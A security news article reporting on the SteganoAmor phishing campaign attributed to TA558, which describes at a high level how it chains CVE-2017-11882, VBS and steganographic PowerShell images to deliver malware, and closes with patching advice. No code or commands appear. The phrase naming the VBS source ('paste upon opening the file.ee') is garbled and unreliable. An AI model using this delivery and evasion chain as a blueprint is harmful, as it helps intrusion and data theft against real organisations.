HQ/EMEAFind out how we can help your business
A sophisticated cyberattack campaign called SteganoAmor poses a significant threat to over 320 organisations globally. Based on reports, this latest threat is orchestrated by the notorious TA558 hacking group, renowned for targeting the hospitality and tourism sectors, particularly in Latin America.
Researchers explained that this campaign is unique since it uses steganography, a technique that hides malicious code within harmless-looking images to bypass user and security solutions’ detection.
The new SteganoAmor campaign leverages emails that contain Excel and Word files.
The modus operandi of SteganoAmor includes the distribution of deceptive emails containing seemingly safe document attachments, such as Excel and Word files.
These attachments exploit a known flaw, CVE-2017-11882, in older versions of MS Office’s Equation Editor, which was already addressed in 2017. By leveraging compromised SMTP servers, the attackers ensure their emails originate from legitimate domains, preventing them from raising suspicions.
Upon opening these tainted documents, victims unknowingly download a VBS from a seemingly benign source, ‘paste upon opening the file.ee.’ Subsequently, this script retrieves an image file encoded with a base64 payload.
This harmless image contains PowerShell code, which in turn downloads the final payload – an executable file encoded in reversed base64 format containing various malware strains.
The versatility of SteganoAmor is alarming, as it delivers various malware families, such as AgentTesla, FormBook, Remcos, LokiBot, Guloader, Snake Keylogger, and XWorm. To further obfuscate their activities, the attackers use reputable cloud services like Google Drive to host their malicious payloads, exploiting the platforms’ legitimacy to bypass AV defences.
Compromised legitimate FTP servers serve as C2 infrastructure, facilitating the covert exfiltration of stolen data while hiding network traffic to appear as a safe entity. Although most attacks have been concentrated in Latin America, SteganoAmor’s scope extends globally, posing a significant threat to organisations across diverse sectors.
Despite the sophistication of the SteganoAmor campaign, the defence against it is relatively simple. Researchers urge users to update their Microsoft Office to the latest version to neutralise the exploit, rendering the attack chain ineffective.
By addressing this vulnerability, organisations can fortify their defences against TA558’s new tactics, protecting themselves from the dangers of SteganoAmor.
